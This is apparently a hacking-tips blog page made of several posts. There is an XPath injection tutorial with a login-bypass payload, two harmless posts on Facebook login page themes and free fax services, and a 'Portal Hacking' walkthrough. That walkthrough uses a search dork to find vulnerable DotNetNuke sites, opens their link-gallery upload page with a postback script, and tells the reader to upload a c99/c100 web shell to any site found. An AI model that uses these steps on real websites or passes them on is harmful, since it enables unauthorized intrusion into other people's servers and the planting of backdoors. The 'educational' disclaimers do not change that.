Tips & Tricks

Note:=  This is Education and learning purpose only.

 Hack Websites Database Using XPath Injection

Everyday many website gets hacked by hackers but most of the hackers are hacking those website just for popularity nothing else. Today i am writing this tutorial on XPath Injection, in which i will explain you, How Hackers Hack Website Using XPath Injection.

In a typical Web Application architecture, all data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input.

Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases.

Before we go deeper into XPATH injection lets take a brief look at what XML and XPath.

What is XML?

XML stands for Extensible Markup Language and was designed or used to describe data. It provide platform for programmers to create their own customized tags to store data on database server. An XML document is mostly similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, data is stored in a table rows and columns and in XML the data is stored in nodes in a tree form.

What is XPath?

XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Lets learn with the help of examples that will show how XPath works, Let's assume that our database is represented by the following XML file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>wildhacker</username>
<password>123</password>
<account>admin</account>
</user>
<user>
<username>cutler</username>
<password>jay</password>
<account>guest</account>
</user>
<user>
<username>ronie</username>
<password>coleman</password>
<account>guest</account>
</user>
</users>

The above code show how username,password and user account details stored in XML file.

Following XPath query is used to returns the account whose username is "innocenthacker" and the password is "123" : ,

string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())

If the application developer does not properly filter user input, the tester or hacker will be easily able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

Username: ' or '1' = '1
Password: ' or '1' = '1

Using these above parameters, the query becomes:

string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())

As in most of the common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.

That’s it.

 ======================================================================================================================

 Customize Your Facebook Login Page

I don't know whether you will like it not but like Windows Logan Screen you can customize your Facebook Login page too. Now you can make your own Facebook Login Page it your bored with normal one.

To customize Facebook Login page you have to download and install this extension for Google chrome from here named FB Refresh .Now just set the background image URL and Customize Your Facebook Login Page.

======================================================================================================================

 Free online Fax Sending Service

There are many website who provide you to send fax online , I am just highlighting some of them which are free.

1. GotFreeFax
2. MyFax
3. PopFax

  In these above three site you have to just put information of sender and receiver then upload your doc or pdf file and send fax online.


Free Online Fax Receiving Service


If you want to receive Fax online , then there is option to do this , you need to visit eFax ,but the problem is it is free for only 30 days.The best part of this service is

1. Get a local fax number
2. Send & receive faxes by email
3. No risk/no obligation
4. Secure and private

Free Online Fax Sending & Receiving Using Google Chrome Apps


I have a another one to send and receive free online fax service .This is not a website ,this is a Google chrome apps or extension called HelloFax. Just download HalloFax and install it on Google Chrome to send and receive Fax online just for free.This apps also provide you to Signing documents & filling out forms.

So why use fax machine where you can send it online at free of cost.So next time you need to fax a document of PDF file have a try this service, and comment please if it really work for you.


====================================================================================================================== 

Portal Hacking

Note:-This article is for educational purpose only.
Step 1 :
http://www.google.com

Step 2:Now enter this dork

:inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

 

Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc.

 ======================================================================================================================